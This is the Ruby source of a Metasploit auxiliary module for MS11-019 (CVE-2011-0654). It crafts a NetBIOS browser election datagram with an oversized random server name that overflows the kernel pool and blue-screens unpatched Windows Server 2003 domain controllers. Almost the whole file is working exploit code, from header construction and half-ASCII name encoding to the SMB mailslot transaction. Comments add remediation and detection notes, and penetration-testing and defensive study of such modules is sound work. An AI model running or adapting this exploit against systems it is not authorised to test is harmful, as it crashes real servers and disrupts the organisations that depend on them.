Path: blob/master/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for MS11-019 / CVE-2011-0654 (see References below).
# It sends one NetBIOS DIRECT_GROUP datagram (UDP/138) carrying a browser
# election request to the \MAILSLOT\BROWSER mailslot; on an unpatched
# Windows Server 2003 domain controller this corrupts the kernel pool and the
# host blue-screens (Description below). The module is destructive by design
# and has no non-crashing "check" path. The remediation is the MS11-019 update.
# From a monitoring standpoint the datagram stands out by its election body:
# hundreds of random bytes (410 here) where a normal election carries only a
# handful of fixed fields plus a server name.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  #include Msf::Exploit::Remote::SMB::Client
  include Auxiliary::Dos

  # Module metadata and options.
  #
  # RPORT defaults to 138 (NetBIOS datagram service). DOMAIN is the NetBIOS
  # name the target DC serves; it becomes the destination name of the
  # datagram (see name_dst in #run) and is required.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft Windows Browser Pool DoS',
      'Description' => %q{
          This module exploits a denial of service flaw in the Microsoft
        Windows SMB service on versions of Windows Server 2003 that have been
        configured as a domain controller. By sending a specially crafted election
        request, an attacker can cause a pool overflow.

        The vulnerability appears to be due to an error handling a length value
        while calculating the amount of memory to copy to a buffer. When there are
        zero bytes left in the buffer, the length value is improperly decremented
        and an integer underflow occurs. The resulting value is used in several
        calculations and is then passed as the length value to an inline memcpy
        operation.

        Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and
        causes considerable damage to kernel heap memory. While theoretically possible,
        it does not appear to be trivial to turn this vulnerability into remote (or
        even local) code execution.
      },
      'References'  =>
        [
          [ 'CVE', '2011-0654' ],
          [ 'BID', '46360' ],
          [ 'OSVDB', '70881' ],
          [ 'MSB', 'MS11-019' ],
          [ 'EDB', '16166' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2011/Feb/285' ]
        ],
      'Author'      => [ 'Cupidon-3005', 'jduck' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(138),
        OptString.new('DOMAIN', [ true, "The name of the domain that the target controls" ])
      ])
  end


  # Build and send the single malformed datagram, then disconnect.
  #
  # Layout of what goes on the wire (all built in this method):
  #   NetBIOS datagram header (nbdghdr, 14 bytes)
  #   + encoded source name   (random 15-char name, suffix "AA" -> 0x00)
  #   + encoded destination   (DOMAIN, suffix "BO" -> 0x1e)
  #   + SMB_COM_TRANSACTION to \MAILSLOT\BROWSER whose data is `election`
  # Nothing is read back; the target is expected to crash rather than reply.
  def run

    connect_udp
    # The SMB client is only used by #trans_mailslot to fill in SMB header
    # defaults; no SMB session is negotiated over UDP.
    @client = Rex::Proto::SMB::Client.new(udp_sock)

    # Local address that routes to RHOST, packed for the SOURCE_IP field of
    # the datagram header (resolv_nbo: network byte order, per its name).
    ip = Rex::Socket.source_address(datastore['RHOST'])
    ip_src = Rex::Socket.resolv_nbo(ip, false)

    # Service suffixes are given already in half-ASCII form (see #half_ascii):
    # "AA" decodes to 0x00 and "BO" to 0x1e, each followed by the 0x00 that
    # terminates the encoded name.
    svc_src = "\x41\x41\x00" # pre-encoded?
    name_src = Rex::Text.rand_text_alphanumeric(15) # 4+rand(10))

    svc_dst = "\x42\x4f\x00" # pre-encoded?
    name_dst = datastore['DOMAIN']

    pipe = "\\MAILSLOT\\BROWSER"

    # Browser election request. The fixed fields are a plausible election;
    # the oversized trailing "server name" (410 random bytes + NUL) is what
    # drives the length-handling bug described above.
    election =
      "\x08" + # Election Request
      "\x09" + # Election Version
      "\xa8" + # election desire - Domain Master & WINS & NT
      "\x0f" + # Browser Protocol Major Version
      "\x01" + # Browser Protocol Minor Version
      "\x20" + # Election OS (NT Server)
      "\x1b\xe9\xa5\x00" + # Uptime
      "\x00\x00\x00\x00" + # NULL... Padding?
      #("A" * 4) + "\x00"
      Rex::Text.rand_text_alphanumeric(410) + "\x00"

    # 14-byte NetBIOS datagram header: type, flags, DGM_ID, source IP,
    # source port, DGM_LENGTH (offset 0x0a, fixed up below), PACKET_OFFSET.
    nbdghdr =
      "\x11" + # DIRECT_GROUP datagram
      "\x02" + # first and only fragment
      [rand(0xffff)].pack('n') + # Transaction Id (DGM_ID)
      ip_src +
      "\x00\x8a" + # Source Port (138)
      "\x00\xa7" + # DGM_LENGTH, patched in after
      "\x00\x00" # PACKET_OFFSET

    nbdgs = nbdghdr +
      half_ascii(name_src, svc_src) +
      half_ascii(name_dst, svc_dst)

    # A Trans request for the mailslot
    nbdgs << trans_mailslot(pipe, '', election)

    # Patch up the length (less the nb header)
    # DGM_LENGTH counts everything after the 14-byte header.
    nbdgs[0x0a, 2] = [nbdgs.length - nbdghdr.length].pack('n')

    print_status("Sending specially crafted browser election request..")
    #print_status("\n" + Rex::Text.to_hex_dump(nbdgs))
    udp_sock.put(nbdgs)

    # No response is awaited or checked; the status line is an expectation,
    # not a verified result.
    print_status("The target should encounter a blue screen error now.")

    disconnect_udp

  end


  # Perform a browser election request using the specified subcommand, parameters, and data
  #
  # Returns the raw SMB_COM_TRANSACTION bytes (NetBIOS session header
  # stripped) for a write to mailslot `pipe` with transaction parameters
  # `param` and data `body`. Requires @client (set in #run) for SMB header
  # defaults.
  #
  # NOTE(review): `pipe` is mutated in place when it lacks a trailing NUL, so
  # the caller's string changes; harmless for the literal passed from #run,
  # but a frozen string would raise here.
  def trans_mailslot(pipe, param = '', body = '')

    # Null-terminate the pipe parameter if needed
    if (pipe[-1,1] != "\x00")
      pipe << "\x00"
    end

    pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct
    @client.smb_defaults(pkt['Payload']['SMB'])

    # Three setup words: mailslot write subcommand and its priority/class
    # (values as in the original; exact meaning not verified here).
    setup_count = 3
    setup_data = [1, 0, 2].pack('v*')

    # Transaction payload is name, then params, then data, back to back.
    data = pipe + param + body

    # Offsets are measured from the start of the SMB header, i.e. after the
    # 4-byte NetBIOS header that pkt.to_s includes (hence the -4); the
    # setup words sit between the fixed fields and the name.
    base_offset = pkt.to_s.length + (setup_count * 2) - 4
    param_offset = base_offset + pipe.length
    data_offset = param_offset + param.length

    pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION
    pkt['Payload']['SMB'].v['Flags1'] = 0x0
    pkt['Payload']['SMB'].v['Flags2'] = 0x0
    pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count

    pkt['Payload'].v['ParamCountTotal'] = param.length
    pkt['Payload'].v['DataCountTotal'] = data.length
    pkt['Payload'].v['ParamCountMax'] = 0
    pkt['Payload'].v['DataCountMax'] = 0

    pkt['Payload'].v['ParamCount'] = param.length
    # ParamOffset is left at the struct default when there are no params.
    pkt['Payload'].v['ParamOffset'] = param_offset if param.length > 0
    pkt['Payload'].v['DataCount'] = body.length
    pkt['Payload'].v['DataOffset'] = data_offset
    pkt['Payload'].v['SetupCount'] = setup_count
    pkt['Payload'].v['SetupData'] = setup_data

    pkt['Payload'].v['Payload'] = data

    exploit = pkt.to_s

    # Strip off the netbios header (thx, but no thx!)
    # Datagrams carry no session header, so drop the first 4 bytes.
    exploit[4, exploit.length - 4]
  end


  # NetBIOS "half-ASCII" (first-level) name encoding.
  #
  # Each byte of `name` becomes two letters, 'A' + high nibble and
  # 'A' + low nibble; the name is padded with "CA" (which decodes to 0x20,
  # a space) up to 15 bytes, then `svc` is appended verbatim because the
  # callers pass the service suffix already encoded. The leading " " is
  # 0x20 = 32, the length of the encoded name that follows
  # (16 bytes * 2 letters).
  #
  # NOTE(review): there is no truncation when `name` is longer than 15
  # bytes (DOMAIN is user input): `left` goes negative, no padding is
  # added, and the encoded name overruns the 32-byte field the length
  # byte announces.
  def half_ascii(name, svc)
    ret = " "
    name.unpack('C*').each { |byte|
      ret << [0x41 + (byte >> 4)].pack('C')
      ret << [0x41 + (byte & 0xf)].pack('C')
    }
    left = 15 - name.length
    if left > 0
      ret << "\x43\x41" * left
    end

    # In our case, svc is already encoded..
    ret << svc
    ret
  end
end